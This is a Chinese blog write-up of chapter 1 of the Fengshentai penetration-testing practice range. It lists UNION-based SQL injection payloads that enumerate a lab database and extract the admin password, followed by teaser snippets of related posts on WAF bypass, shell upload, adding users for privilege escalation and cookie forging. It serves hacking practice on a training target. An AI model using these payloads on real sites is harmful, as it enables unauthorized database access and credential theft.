封神台靶场-第一章

最新推荐文章于 2025-10-09 15:54:26 发布
原创 最新推荐文章于 2025-10-09 15:54:26 发布 · 2.9k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#渗透测试靶场

本文详细介绍了如何通过SQL注入获取管理员密码的过程,包括查找注入点、确定注入类型、使用联合查询提取敏感信息等关键步骤。以具体案例演示了SQL注入攻击的全过程。

第一章:为了女神小芳!

Tips:
通过sql注入拿到管理员密码!

  1. 寻找注入点,判断是什么注入
    |?id=1 and 1=1| 显示正常 |
    |-|–|
    | ?id=1and 1=2| 页面有变故(存在注入) |
    |?id=1’ | 页面有回显但是无法判断注入类型|
    |||在这里插入图片描述
    在这里插入图片描述

  2. 查看列数及字段数(这里通过二分法可以快速定位列数为2)
    在这里插入图片描述

  3. 联合查询(注意前面id为假才会执行后门的联合查询)
    |?id=121 union select 1,2 #| 查看回显位置 |
    |–|--|
    |?id=121 union select 1,database() #| 查看数据库 |
    |?id=121 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #| 查看表名 |
    |?id=112 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘admin’ #| 查看字段名 |
    |?id=112 union select 1,(select group_concat(username,0x3a,password) from admin) #|查询字段值 |

回显位置:2
在这里插入图片描述
数据库名:maoshe
在这里插入图片描述
表名:admin,dir,new,xss(猜测表明为admin)
在这里插入图片描述
字段名:id,uesename,password
在这里插入图片描述
账号密码:admin:hellohack
在这里插入图片描述

封神台靶场-第二章
Mr_helloword的博客
07-12 3317
第二章:遇到阻难!绕过WAF过滤 1.查找有无sql注入点利用and 1=1发现做了过滤 使用order by 查字段数发现order by 没有被过滤,最后当字段为10时显示正常字段为10 2.因为网页做了waf过略防护,这里我们考虑用cookie注入,可以进行绕过: 这里我们使用一个小工具进行注入(火狐插件) 这款工具可以自定义请求头响应头(Request header,Reponse header) 打开这款插件直接在value处填写注入参数即可然后按上面的键开始(value中的值需要注意的是空
封神台靶场-第五章
Mr_helloword的博客
07-11 2152
第五章- 进击!拿到Web最高权限 Tips: 通过修改Cookie登录后台(没用重打) 2、上传SHELL!3、Flag在web根目录(flag.php) 3.上传图片时建议上传小文件,我建议用QQ表情。 来到传送门提示修改cookie,这里我们想到了第四关的flag-cookie信息如下,修改cookie信息,成功进入后台。 cookie:ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC 在存储里将上面的cookie值进行修改: 根据提示信息这
封神台第一章:为了女神小芳
qq_51459600的博客
12-22 604
实验平台:封神台-掌控安全在线演练靶场 第一章:为了女神小芳! 传送门:http://rhiq8003.ia.aqlab.cn/ 实验目标:获取admin的密码 点击查看新闻1,跳转到http://rhiq8003.ia.aqlab.cn/?id=1 发现传递的参数名为id   判断有无注入点 http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 未显示出新闻内容,说明存在注入点   判断查询字段数 http://rhiq8003.ia.aqlab.cn/
封神台-第一章:为了女神小芳!
qq_64409509的博客
06-02 181
封神台-第一章:为了女神小芳
2025最新渗透测试靶场推荐
最新发布
小司机的奥拓
10-09 573
网址:https://www.cyberstrikelab.com/CyberStrikeLab 是一个专注于网络安全的在线仿真实战平台,由经验丰富的红队人员打造,以实战、系统、便利为特色,其靶机根据多年实战案例搭建,能帮助学习者提升网络安全实战技能。网址:https://app.hackthebox.com/Hack The Box 是一个国际知名的网络安全渗透测试实战靶场平台,提供在线的渗透测试环境与挑战,帮助网络安全学习者与从业者提升实战技能。网址:https://hackmyvm.eu/
封神台----尤里的复仇I-第一章:为了女神小芳
正在学习的路上...
07-17 3141
1.找注入点 ?id=1 and 1=1 ------ 显示正常 ?id=1 and 1=2 ------ 不显示 2.猜列数、报显示位 ?id=1 order by 2 ------查询了两列 ?id=466454 select 1,2 ------将id设为一个不存在的数...
mbp 封神台靶场 一(笔记)
热门推荐
qq_43558415的博客
02-09 1万+
最近在看掌控安全的公开课,里面提到了封神台靶场,因为以前也做过网易云课堂的靶场,便轻车熟路地注册了账号登陆靶场,先看了第一关。第一关是通过SQL注入找到管理员密码,打开链接,点进去一看发现有猫腻。 一、寻找注入点 看到id=1,便可以用id=1’或id=1 and 1=2来进行测试,以id=1’为例,发现网页出现了错误。 二、判断字段数 在发现这可以进行SQL注入后便要判断它的字段数,用...
注入(一)
tomyyyyy
06-28 347
eg: 例子 第一步,判断是否存在sql注入漏洞 构造 ?id=1 and 1=1 ,回车 页面返回正常 构造 ?id=1 and 1=2 ,回车 页面不正常,初步判断这里 可能 存在一个注入漏洞 第二步:判断字段数 构造 ?id=1 and 1=1 order by 1 回车 页面正常 构造 ?id=1 and 1=1 order by 2 回车 页面正常 构造 ?id=1 and 1=1 o...
封神台在线靶场——第一章:为了女神小芳!
pigzlfa的博客
10-10 861
sql注入基础版。
封神台----尤里的复仇I-第三章:这个后台能识别登录者…
正在学习的路上...
07-18 2057
根据提示,真正的后台地址为admin123,输入上一关的账号、密码进去。 分析代码: 从请求头中拿到Referer,并赋值给ComeUrl。 判断ComeUrl是否为空,若是空,则表明是直接输入地址访问。本题不允许 ComeUrl不为空, 读取Host,并在前面拼接 http:// 赋值给cUrl,如果ComeUrl有 " : ",表明有端口号,在为cUrl 加上端口号。 最后判断cUrl和...
封神台----尤里的复仇I-第六章:SYSTEM!POWER!
正在学习的路上...
07-19 1667
通过上一章,上传的shell,使用菜刀连接 右键点击 输入命令 whoami 权限不足,这里需要用到提权工具,工具在 就不用再上传了。 右键点击cmd.exe,打开虚拟终端,输入whoami,可以看到当前用户。 尝试创建用户命令: net user 110 110 /add 还是权限不足。 这是因为cmd需要用到外部接口wscript.shell。 但是wscript.shell仍然...
登录别人的账户(仅在封神台靶场).mp4
04-07
这个教程仅在封神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
封神台靶场
m0_71518346的博客
10-18 1088
尝试,将测试语句放到cookie里面,再发送给服务器,因为网页防护一般只拦截Get、post传参。使用ModHeader插件,SQL语句的空格用加号代替。用from猜测有没有admin表 union select 1,2,3,4,5,6,7,8,9,10 from admin 被拦截。username和password字段的值:admin、b9a2a2b5dffb918c。直接尝试注入判断字段数order by 10。默认管理员后台是根目录的/admin/发现页面回显了2、3、7、8、9。
封神台靶场(一)为了女神小芳 【SQL注入攻击】(超级详细)
xiao_mai_的博客
05-11 1220
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
封神台靶场 第一章:为了女神小芳 (SQL注入)
m0_65712192的博客
10-14 2617
封神台靶场 第一章:为了女神小芳 (SQL注入)
初识sqlmap学习笔记(封神台靶场第一题:为了女神小芳!)
qq_66013948的博客
09-17 342
在网页中,我们有的时候会在上方的可以输入url的地方进行输入,比如输入一个url,或者直接用其进行搜索。如果我们正常输入name的参数和密码,这就是一个正常的查询,不过我们把密码输错了,那就可能会导致查询不到数据,或者显示密码错误。这个时候,无论我们输入的密码是什么,这个数据库的查询都是正确的查询,因此,这会给黑客一个不用管理员密码就可以直接登录为管理员的一个方法,也就是专业人士口中的sql注入漏洞。可以看到admin是管理员,于是,管理员的密码也就是hellohack,那么,这道题的flag也就是这个。
封神台SQL注入-基础靶场1-Head注入
原味瓜子、的博客
10-10 1257
1111
封神台——BurpSuite入门(改包、爆破)
Zichel77的博客
07-04 1858
点击传送门进来看到的就是一个很简陋的网站,我们来到一个网站就先注册一下,感受一下全面的服务 一个假网做的还挺完备 点击一个产品 看到他的设计如此之烂,什么也没有居然要价5400 很多购物网站都存在着支付漏洞,于是我们抓个包试试看 首先打开BS,然后打开代理,最后将商品加入购物车 然后发现BS亮了 屏幕剪辑的捕获时间: 2020/7/2 12:05 点进去点进去 ...
封神台靶场学习-sql-注入绕过防护getshell
buggun6的博客
11-19 981
很好,没花啥功夫就找到了上传点,要求我们只允许上传的图片类型:gif|jpeg|png|jpg|bmp。总结:这次靶场个人感觉质量还是挺高的,和之前省赛的题有点像, 自己要坚持努力学习!好的进入后台了,现在要找flag很明显就不得不找找文件上传点写码上传试试了。很明显没有返回我们想要的东西,联合注入这条路估计是行不通了。ok,既然拿到用户名和密码了,不直接登录还有其他选项吗。解密发现密码也是admin,好家伙,弱口令是吧(nice,报错注入可以,我们发现数据库了。
封神台靶场第四关
03-27
### 封神台靶场第四关解决方案 封神台靶场是一个专门用于练习 Web 安全技能的平台,其中每一关都涉及不同的安全漏洞和技术挑战。对于第四关,目标通常围绕着通过修改 Cookie 来获取敏感数据或权限提升。 #### 背景分析 在这一关中,用户需要利用之前提到的 `Cookie` 修改技巧来绕过系统的身份验证机制并访问受保护的内容。具体来说,可以通过设置特定的 `Cookie` 值实现对后台管理页面的访问[^1]。以下是详细的解决方法: --- #### 技术细节与操作流程 ##### 1. **理解目标** 本关的核心在于识别系统如何依赖于客户端发送的 `Cookie` 进行认证,并尝试伪造合法的身份标识符以获得更高权限。这一步骤涉及到 HTTP 协议中的会话管理和安全性缺陷的知识点[^2]。 ##### 2. **工具准备** 为了完成此任务,可以借助浏览器开发者工具或者第三方插件(如 Burp Suite),这些工具有助于拦截和篡改请求头中的信息。 - 打开浏览器控制台 (`F12`) 并切换到“网络(Network)”标签页。 - 刷新当前网页以便捕获所有发出的数据包。 ##### 3. **定位关键参数** 观察登录后的响应消息,在返回的结果里找到名为 `ADMINSESSIONIDCSTRCSDQ` 的字段及其对应的值。这是服务器用来跟踪用户的唯一标志之一。 ```bash Set-Cookie: ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC; Path=/; HttpOnly ``` 上述代码片段展示了实际使用的 Session ID 形式;注意这里的属性可能还包括其他选项比如 Secure 或者 Expires/Max-Age 等定义生命周期的信息。 ##### 4. **实施攻击** 一旦明确了应该调整哪个部分,则可以直接编辑本地存储内的相应条目使之匹配预期格式即可顺利通行至下一步界面[^3]。 执行以下动作: - 在 Storage Inspector 中查找现有的 Cookies; - 删除旧版本记录重新创建一条新纪录其名称保持一致但赋予新的随机字符串作为 Value 部分。 > 注意事项:确保所输入内容符合编码规则以免引起解析错误影响后续判断逻辑准确性。 --- #### Python脚本辅助自动化过程 如果希望进一步简化重复劳动量较大的环节还可以编写简单的Python程序帮助快速生成所需的payloads: ```python import random import string def generate_random_string(length): letters_and_digits = string.ascii_letters + string.digits result_str = ''.join((random.choice(letters_and_digits) for i in range(length))) return result_str session_id_length = 20 # 自定义长度依据实际情况设定 new_session_value = f"{generate_random_string(session_id_length)}" print(f"New forged session value is : {new_session_value}") ``` 运行以上脚本将会得到一个新的伪随机数串可以用作替换原始Session Token的基础素材。 --- ### 总结说明 通过对封神台靶场第四关的学习实践不仅能够加深学员们关于Web应用程序常见安全隐患的认识程度而且还能锻炼动手解决问题的能力从而更好地适应未来工作中遇到的各种复杂场景需求.
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值